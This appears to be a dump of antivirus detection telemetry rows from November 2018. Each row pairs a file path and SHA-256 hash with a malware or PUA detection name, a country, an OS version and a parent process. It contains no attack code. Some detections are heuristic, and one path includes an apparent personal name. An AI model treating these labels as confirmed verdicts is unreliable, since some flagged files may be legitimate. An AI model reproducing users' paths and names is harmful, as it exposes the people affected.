  Row(detection=Row(filename='avscan-20181101-112629-002ee4bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8173745\\AVSCAN-20181101-111512-6E8DC715\\AVSCAN-20181101-112629-002EE4BC', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:26:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='change sped contabil installation.exe', filepath='C:\\Arquivos de Programas RFB\\Programas SPED\\SpedContabil\\SpedContabil_installation\\Change Sped Contabil Installation.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a4f89cbfb38f2fe3480813d625b0ce165e6d171343b0b01815f3655f4625c9a6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upibi                                   .scr', filepath='E:\\UPIBI                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inputmapper.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\xD\\input mapper\\InputMapper.exe', filesize=2496000, name='W32/Neshta.A.#M1.#R1'), hash='e4d0a14e3e9510d05e51cbb92dd554b9fc1fee829b9cd0e883060b023d246706', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:36:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir001', filepath='\\\\?\\C:\\Applications\\Service.VIR001', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B8B0C4CED6F4940AD618504357EE6F92FC54251C20D762162F50B9A683781759', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='000533', filepath='./Malware_20181025/20181025_Total/000533', filesize=128000, name='DIAL/302273.#M0.#R0'), hash='edd562bd2c3fc6522698ead30edde3f9fd97c2e1bff3b4fd824cc15b8c083810', metadata=Row(cmdline=None, country='TW', os_name='Linux', os_vmajor='Ubuntu 14', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_11e0eea1.exe', filepath='E:\\UPD1.RLD.FA16\\Setup_11e0eea1.exe', filesize=128000, name='HEUR/AGEN.1008878.#M1.#R1'), hash='bae28f50a97a46e67fba78fa185937d3cb645481ec0ff707a56b630e4f8566d5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe266_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe266 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='KE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=349184, timestamp='2018-11-01T15:57:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r5ir13f', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R5IR13F', filesize=64000, name='VBA/Dldr.Agent.dserd.#M1.#R1'), hash='b285603f06baa809f49c91a2fe8abe904fb9ce06954359d024a791c79f8f8f4d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T17:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moucdfoh.exe', filepath='F:\\RECYCLER_DETEC\\S-3-8-65-8402467574-3770633725-252716346-1347\\moUCDfoh.exe', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1552384, timestamp='2018-11-04T12:57:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225452-231c2659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e7bd116\\AVSCAN-20181104-225227-1042A9D6\\AVSCAN-20181104-225452-231C2659', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='33d69fa6ccc1befaa7873fd9d41937925752c0237be06c1be9ec2c72c4c9ee02', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:54:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224914-e25032fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200545-360213F6\\AVSCAN-20181104-224914-E25032FB', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rumomeca.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9322724\\rumomeca.exe', filesize=576000, name='HEUR/AGEN.1000047.#M1.#R1'), hash='607c3b31d74eae6fbd9b348ddac1ec1bb9d1897eb4dffcd415c998dbaf1ff059', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T05:21:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131731-33ab7080', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131731-33AB7080', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:12:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130722-05a8b8a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130722-05A8B8A1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iiwusqomkv.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\iiwusqomkV.exe', filesize=85584000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='8bc154916474de9fcf7b18d62ec08a73e7d5c869bc477c4063d85171d3967601', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T19:04:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:36:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001507-7e6e7633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001507-7E6E7633', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:44:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225827-25c8f767', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202113-A73A1DA0\\AVSCAN-20181104-225827-25C8F767', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:31:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224925-e3a43f6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200545-360213F6\\AVSCAN-20181104-224925-E3A43F6C', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131504-289638a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131504-289638A0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090513-98e48c93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_396c2e7c\\AVSCAN-20181104-084957-1E887E53\\AVSCAN-20181104-090513-98E48C93', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:12:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131646-0933455c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ce409ba\\AVSCAN-20181104-130709-B225149F\\AVSCAN-20181104-131646-0933455C', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:16:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T11:37:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_daemon-tools-lite_vwdzgd.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_daemon-tools-lite_VWdZgD.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='1b28257a33c6c912fd9a242149f00bb28bc7ce217a59be971850bc761f712eea', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T00:40:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='oeaw0c92d3d.dll', filepath='\\\\?\\C:\\Windows\\OeAW0c92d3d.dll', filesize=192000, name='Adware/Elex.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:35:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9199559\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\QMDownload\\SoftMgr\\PowerISO7-7.2-x86.exe', parentsize=4945968, timestamp='2018-11-04T11:01:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182828.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp107\\A0182828.exe', filesize=256000, name='SPR/PowerReg.99e54f.#M1.#R1'), hash='99e54f93d14d14cf33ebd3572cbc8f18281436d38099f7f0bb8fd16a8f45bf90', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:40:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f44658056.dll', filepath='D:\\hdd\\recup_dir.185\\f44658056.dll', filesize=320000, name='HEUR/AGEN.1028998.#M1.#R1'), hash='ceeced85c579dfe78b2fa5f59f658df61b7522f2cda17b3b351af3068d811740', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Chris Wierzba\\Downloads\\testdisk-7.1-WIP\\photorec_win.exe', parentsize=867384, timestamp='2018-11-04T07:38:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='belies.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Obstructing\\belies.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='5edc60b559c72319c9df75f6a7250814d740868131db700d31574bd0d6be5180', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:48:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:41:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T05:11:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2a95a7d6.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2a95a7d6.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T16:39:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\FTUZMQHB2K\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='06967b05063de0517c283f751c4262fb8e7d30198fdaf1300ff24f0fc5a670b3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+z5w5T+gzkeY75IQ.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T10:51:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:20:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-184401-873ade8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a11d071\\AVSCAN-20181103-184328-80B5DDCF\\AVSCAN-20181103-184401-873ADE8A', filesize=1544000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='34deac3a3ff5894de2a513d6e6a9735af258309f5c0d6a3d890c733fa126ea60', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:44:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steamclient.dll', filepath='D:\\Half-Life 2\\bin\\steamclient.dll', filesize=512000, name='SPR/GameHack.#M1.#R1'), hash='1e736ee3d89ca094d5e435268a5fcf32cb633d8366cf1ff9d84564e152ab3401', metadata=Row(cmdline='-steam -game hl2 -appid 220 ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Half-Life 2\\hl2.exe', parentsize=103760, timestamp='2018-11-04T07:02:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='511e5e2a1f74aabb0d784f79be400b829407820b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\511e5e2a1f74aabb0d784f79be400b829407820b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='19fed12057a16bbbb69cb89bbf876c9756bb53b6765c41c9d44d4084d5840a56', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111353-ce03106f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56777924\\AVSCAN-20181104-111320-C816040E\\AVSCAN-20181104-111353-CE03106F', filesize=448000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:13:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='9889486a0a57ff8c858a9629729b4feacf47aa9f28ff1440d3f9cebfd5292acb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:52:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202256-c65298a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-202256-C65298A6', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:22:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tylO5IJZbUyVvd6n.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T07:40:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:15:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:51:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140324-f8720268', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140324-F8720268', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104216-ef182856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d977c98\\AVSCAN-20181104-104149-EB76981F\\AVSCAN-20181104-104216-EF182856', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:27:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:03:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='supercow.exe', filepath='D:\\New Folder\\mp3\\gameeeeeeeeeeeees\\البقرة 2\\supercow.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='0348256c3faf7a32b504e3324a2400fa7165253f0266e15bf9008a4744922abd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T19:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142853-92a8f6e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6cdc580\\AVSCAN-20181104-142729-89022BDE\\AVSCAN-20181104-142853-92A8F6E1', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:29:00Z'), dt=datetime.date(2018, 11, 4)),
